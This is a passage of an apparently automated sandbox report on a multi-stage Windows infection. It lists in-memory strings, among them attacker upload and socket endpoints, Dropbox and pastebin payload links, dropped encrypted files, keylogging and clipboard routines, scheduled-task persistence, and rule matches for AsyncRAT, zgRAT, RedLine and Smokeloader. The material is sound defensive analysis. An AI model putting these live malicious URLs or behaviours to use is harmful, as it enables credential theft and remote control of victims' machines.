                        Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/v
                        Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp, 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp, 3546345.exe, 00000025.00000002.4763090277.000000000112E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/v1/upload.php
                        Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/v1/upload.php%qN
                        Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/v1/upload.php/qH
                        Source: 3546345.exe, 00000025.00000002.4763090277.000000000112E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/v1/upload.php0
                        Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/v1/upload.php9
                        Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/v1/upload.phpBJ
                        Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/v1/upload.phpG
                        Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/v1/upload.phpIq
                        Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/v1/upload.phpM?
                        Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/v1/upload.phpOq(
                        Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/v1/upload.phpQq:
                        Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/v1/upload.phpXJ
                        Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/v1/upload.phpj
                        Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/v1/upload.phpl
                        Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/v1/upload.phpsrJG
                        Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/x
                        Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top:80/v1/upload.php
                        Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top:80/v1/upload.phposoft
                        Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top:80/v1/upload.phpraz
                        Source: Shipment.pif, 0000000B.00000000.2048576959.0000000000A19000.00000002.00000001.01000000.00000006.sdmp, Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, GuardTrack.scr, 00000013.00000000.2074054599.0000000000679000.00000002.00000001.01000000.00000008.sdmp, GuardTrack.scr, 00000015.00000000.2161600759.0000000000679000.00000002.00000001.01000000.00000008.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                        Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drString found in binary or memory: http://www.entrust.net/rpa03
                        Source: meta.exe, 00000027.00000002.3873284492.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3872094991.00007FF617E51000.00000004.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BB800000.00000004.00001000.00020000.00000000.sdmp, meta.exe, 00000027.00000000.3447262254.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, meta.exe.11.dr, meta[1].exe.11.drString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
                        Source: meta[1].exe.11.drString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
                        Source: meta.exe, 00000027.00000002.3872094991.00007FF617E51000.00000004.00000001.01000000.00000013.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityh
                        Source: meta.exe, 00000027.00000002.3873284492.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BB800000.00000004.00001000.00020000.00000000.sdmp, meta.exe, 00000027.00000000.3447262254.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, meta.exe.11.dr, meta[1].exe.11.drString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
                        Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000333A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.s
                        Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000333A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, WIDeqOfZq9.exe.51.drString found in binary or memory: https://api.ip.sb/ip
                        Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://direct-link.net/1218649/browse-and-buy-cs2-skins
                        Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://direct-link.net/1218649/windows-latest-updates
                        Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                        Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRYqOGCv-jevzMWu9XILkZeuC_BAi1BgW9cnKgQP1CVVw&s
                        Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3733155923.0000000000D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fusionflow-meta.net/
                        Source: Cerker.exe, 0000001C.00000003.3385926643.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3382418323.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3386987728.000000000121B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fusionflow-meta.net/1G
                        Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fusionflow-meta.net/5
                        Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fusionflow-meta.net/G
                        Source: Cerker.exe, 00000022.00000003.4041557300.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3733155923.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fusionflow-meta.net/socket/?id=5DCF833859158E570DD9A3BCC4B61D98E7D449D8067545A1379CD9413F2CB
                        Source: Cerker.exe, 0000001C.00000002.4585160635.0000000000DAA000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4605809813.0000000000AFA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://fusionflow-meta.net:443/socket/
                        Source: Cerker.exe, 0000001C.00000002.4585160635.0000000000DAA000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4605809813.0000000000AFA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://fusionflow-meta.net:443/socket/.)
                        Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fusionflow-meta.net:443/socket/3422
                        Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fusionflow-meta.net:443/socket/7345342
                        Source: Cerker.exe, 00000022.00000003.4041557300.0000000000D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fusionflow-meta.net:443/socket/?id=5DCF833859158E570DD9A3BCC4B61D98E7D449D8067545A1379CD9413
                        Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fusionflow-meta.net:443/socket/se
                        Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003234000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000325F000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000331B000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.0000000003346000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000320A000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000030F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                        Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/fiLr6dSt
                        Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp, 3546345[1].exe.11.dr, channel2[1].exe.11.dr, 3546345.exe.11.dr, Channel1[1].exe.11.drString found in binary or memory: https://update-ledger.net/update
                        Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                        Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3429372925.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
                        Source: Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/(e
                        Source: Cerker.exe, 0000001C.00000003.4059843797.0000000001215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/K
                        Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/Pe
                        Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/S
                        Source: Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/he
                        Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/r
                        Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/rs
                        Source: Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/rqsnrl6msilfirz1qp1pn/weetwegsdg.exe?rlkey=rmj9i20g87wwdvd6wsdaypie2&
                        Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.drString found in binary or memory: https://www.entrust.net/rpa0
                        Source: Scottish.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                        Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.drString found in binary or memory: https://www.globalsign.com/repository/06
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00624632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,19_2_00624632
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00624830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,19_2_00624830
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00624632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,19_2_00624632
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00610508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,19_2_00610508
                        Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000034C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_f3a5e7a4-8
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0063D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,19_2_0063D164
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp1486.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp14D5.tmpJump to dropped file

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Users\user\AppData\Local\Temp\Entrepreneurs entropy: 7.99797398135Jump to dropped file
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Users\user\AppData\Local\Temp\Greatest entropy: 7.99794017652Jump to dropped file
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Users\user\AppData\Local\Temp\Provides entropy: 7.99760816884Jump to dropped file
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Users\user\AppData\Local\Temp\Competent entropy: 7.99811049854Jump to dropped file
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Users\user\AppData\Local\Temp\Whom entropy: 7.99734780297Jump to dropped file
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Users\user\AppData\Local\Temp\Reveal entropy: 7.99789640851Jump to dropped file
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Users\user\AppData\Local\Temp\Corporate entropy: 7.99704915594Jump to dropped file
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Users\user\AppData\Local\Temp\Screw entropy: 7.99717752647Jump to dropped file
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Users\user\AppData\Local\Temp\Still entropy: 7.9977069634Jump to dropped file
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Users\user\AppData\Local\Temp\Wireless entropy: 7.9965436862Jump to dropped file
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\591950\E entropy: 7.99975204156Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe entropy: 7.99818162851Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe entropy: 7.99818162851Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\TrackGuard Technologies\z entropy: 7.99975204156Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeFile created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe entropy: 7.99821613014Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeFile created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe entropy: 7.99821613014Jump to dropped file

                        System Summary

                        barindex
                        Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 0000001F.00000002.4168709454.0000000002A0F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPEDMatched rule: Detects zgRAT Author: ditekSHen
                        Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\Windows.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: GOLD[1].exe.11.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 311296
                        Source: GOLD.exe.11.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 311296
                        Source: random[1].exe.11.drStatic PE information: section name:
                        Source: random[1].exe.11.drStatic PE information: section name: .idata
                        Source: random[1].exe.11.drStatic PE information: section name:
                        Source: 36f677264b.exe.11.drStatic PE information: section name:
                        Source: 36f677264b.exe.11.drStatic PE information: section name: .idata
                        Source: 36f677264b.exe.11.drStatic PE information: section name:
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_004205E7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,31_2_004205E7
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00614254: CreateFileW,DeviceIoControl,CloseHandle,19_2_00614254
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00608F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,19_2_00608F2E
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeCode function: 0_2_00403899 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403899
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00615778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,19_2_00615778
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Windows\ProjectionAcademyJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Windows\ChipSeemsJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Windows\LaboratoriesFriendJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Windows\ConditionSuperintendentJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Windows\AyePercentJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Windows\CuDefenseJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeFile created: C:\Windows\Tasks\Hkbsse.job
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeCode function: 0_2_004075770_2_00407577
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005BB02019_2_005BB020
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005B94E019_2_005B94E0
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005B9C8019_2_005B9C80
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005D23F519_2_005D23F5
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0063840019_2_00638400
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005E650219_2_005E6502
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005E265E19_2_005E265E
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005BE6F019_2_005BE6F0
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005D282A19_2_005D282A
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005E89BF19_2_005E89BF
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005E6A7419_2_005E6A74
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00630A3A19_2_00630A3A
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005C0BE019_2_005C0BE0
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005DCD5119_2_005DCD51
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0060EDB219_2_0060EDB2
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00618E4419_2_00618E44
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00630EB719_2_00630EB7
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005E6FE619_2_005E6FE6
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005D33B719_2_005D33B7
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005CD45D19_2_005CD45D
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005DF40919_2_005DF409
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005B166319_2_005B1663
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005CF62819_2_005CF628
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005D16B419_2_005D16B4
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005BF6A019_2_005BF6A0
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005D78C319_2_005D78C3
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005D1BA819_2_005D1BA8
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005DDBA519_2_005DDBA5
